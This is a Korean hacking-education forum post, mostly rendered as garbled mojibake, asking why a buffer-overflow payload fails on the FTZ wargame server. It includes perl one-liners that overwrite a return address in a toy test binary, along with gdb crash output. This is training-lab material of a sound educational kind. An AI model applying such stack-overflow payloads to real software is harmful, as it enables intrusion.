¸®´ª½º

 3923, 5/197 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   smile0909
   ftz ¼­¹ö¿¡¼­ Çí»çÄڵ尡 ½ºÅÿ¡ »ðÀÔµÇÁö ¾Ê¾Æ¿ä¤Ð

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_linux&no=4392 [º¹»ç]


°£´ÜÇÑ BOF¿¡ ´ëÇÑ °­ÀÇÀڷḦ ¸¸µé±â À§Çؼ­,  ftz¼­¹öÀÇ guest°èÁ¤À¸·Î ·Î±×ÀÎÇÏ¿© Å×½ºÆ® ÁßÀä.
ÄÄÆÄÀϽÿ¡ °É ¼ö ÀÖ´Â ¿É¼ÇÀº ¸ðµÎ °Ç »óÅÂÀ̱¸¿ä. (-z execstack -fno-builtin -mpreferred-stack-boundary=2)

bof°ø°ÝÀ¸·Î ½ºÅÃÀÇ return addressºÎºÐ¿¡ ÁÖ¼Ò°ª(\x92\x83\x04\x08)À» ³ÖÀ¸·Á°í Çϴµ¥ ¾ÈµÇ±æ·¡..
ÄÚ¾î´ýÇÁ¸¦ ¶°º¸´Ï, ÀÚ²Ù \xc2\x92\xc2\x83\xc2\x04\xc2\x08¿Í °°ÀÌ, Áß°£¿¡ \xc2°ªÀÌ µé¾î°¡°í ÀÖ´Â »óȲÀ̳׿ä.

charÇü ¹è¿­ bufferÅ©±â´Â 4À̱¸¿ä.
¾Æ·¡Ã³·³ ³ª¿É´Ï´Ù..

[guest@ftz test]$ perl -e 'print "a"x4,"b"x4,"\x92\x83\x04\x08"' | ./test
aaaabbbb혪혘
Segmentation fault (core dumped)
[guest@ftz test]$ gdb test core.9330
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
Core was generated by `./test'.
Program terminated with signal 11, Segmentation fault.
Cannot access memory at address 0x400160b0
#0  0x83c292c2 in ?? ()


Ȥ½Ã ½ºÅÃÂÊ¿¡ Çí»çÄڵ带 ³ÖÀ¸¸é Áß°£¿¡ ¾²·¹±â°ªÀÌ µé¾î°¡µµ·Ï ÀǵµÇϽŰǰ¡¿ä?
¿¹Àü¿¡´Â ºÐ¸íÈ÷ 됬´ø ¹æ½ÄÀε¥... ÀÌ»óÇϳ׿ä.. ÀÛ³âÀΰ¡ Á¦ÀÛ³âÀΰ¡´Â ºÐ¸íÈ÷ ftz¼­¹ö¿¡¼­µµ 됬´ø °Í °°Àºµ¥ ¿Ö °©Àڱ⠾ȵÇÁÒ?¤Ð¤Ð

+
¾Æ·¡¿Í °°ÀÌ, BOF¿øÁ¤´ë ¼­¹ö¿¡¼­´Â Àß µ¿ÀÛÇÕ´Ï´Ù. (Á¦°¡ guest°èÁ¤À» µû·Î ¸¸µé¾îµ×½À´Ï´Ù.)
[guest@localhost test]$ perl -e 'print "a"x4,"b"x4,"\x38\x84\x04\x08"' | ./test
aaaabbbb8?
bof success!
  Hit : 2656     Date : 2015/01/23 04:38


    
3843   ftz level1 ¿¡¼­ Áú¹® ÀÖ½À´Ï´Ù µµ¿ÍÁÖ¼¼¿ä ¤Ì¤Ð     bg3209
 03/04 2906
3842   ftz Áú¹®     ju031230
 03/02 2535
3841   I can't login with root on terminal (OS : fedora17)[6]     ±èº´±Ç
 01/29 2940
  ftz ¼­¹ö¿¡¼­ Çí»çÄڵ尡 ½ºÅÿ¡ »ðÀÔµÇÁö ¾Ê¾Æ¿ä¤Ð     smile0909
 01/23 2655
3839   ÅÚ³Ý ftz ¼­¹ö guest ºñ¹Ð¹øÈ£°¡ ¹º°¡¿ä[2]     ÁãÀÌ
 01/06 3211
3838   ÇØÄ¿½ºÄ𠸮´ª½º Æ®·¹À̴׿¡¼­ guest ºñ¹Ð¹øÈ£°¡ ¹º°¡¿ä??[1]     six6th
 01/06 3111
3837   hackerschool ·¹µåÇò ¸®´ª½º9.0°ü·ÃÁú¹®Àε¥¿ä     qotjddn6593
 01/06 2386
3836   CENT OS USB ¼³Ä¡ÈÄ ¹®Á¦     ifocean
 12/26 3125
3835   falcon os second °¡Áö°í ÀÖÀ¸½Å ¸ÚÁøºÐ ¾ø³ª¿ä?     jungkenji
 12/20 2857
3834   °©Àڱ⠻ý°¢³ª¼­ Áú¹®µå¸®´Âµ¥ ½º¸¶Æ®Æù¿¡ vmware[2]     nmy89
 12/17 3878
3833   ¸®´ª½º skelÀ̶ó´Â°Ô Á¤È­È÷¸ÓÁÒ?[2]     kdhan16
 12/17 4114
3832   kali linux¸¦ °¡»ó¸Ó½ÅÀ¸·Î ½ÇÇà½ÃÄ×À»¶§ ±Ã±ÝÇÑÁ¡[1]     cckcamp
 12/07 4087
3831   ÇØÄ¿½ºÄð°­Á ¸Û¸ÛÀÌÄÄÇ»Å͸¦Ã£¾Æ¶ó¿¡¼­.. ssh Æ÷Æ®¹øÈ£¾Ë¶§ telnetÀ¸·Î[1]     alsrbdu
 12/07 3609
3830   ¸®´ª½º x windows (VMware)[1]     inwoong32
 11/30 2657
3829   Ã¥À» °í¹ÎÇÏ°í ÀÖ½À´Ï´Ù.[2]     calliope7487
 11/19 3237
3828   ¹éÆ®·¢5 wlan0 Ĩ¼ÂÀÌ UnknownÀ¸·Î ³ªÅ¸³ª´Â°Ô ¹®Á¦°¡ µÇ³ª¿ä?     jeah9441
 11/14 2871
3827   VMware Backtrack5 USB¹«¼±·£Ä«µå Áú¹®     jeah96
 11/11 3267
3826   vi ¼Ò½º Äڵ带 º¸°í ½ÍÀºµ¥¿ä[2]     lionpoo
 11/11 2982
3825   °¡»ó¸Ó½Å¿¡ ¿ìºÐÅõ¸¦ ±ò°í ssh ¼³Ä¡ÈÄ °¡»ó¸Ó½Å ÀÚü¿¡¼­ Æ÷Æ®Æ÷¿öµù°ú °øÀ¯±â Æ÷Æ®Æ÷¿öµù¿¡¼­ÀÇ ¹®Á¦°¡...     ehaakdl
 11/01 3173
3824   ¸®´ª½º Å͹̳Π⠾°Ô ¶ç¿ì³ª¿ä?[2]     cksrjfl1996
 10/09 4942
[1][2][3][4] 5 [6][7][8][9][10]..[197]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org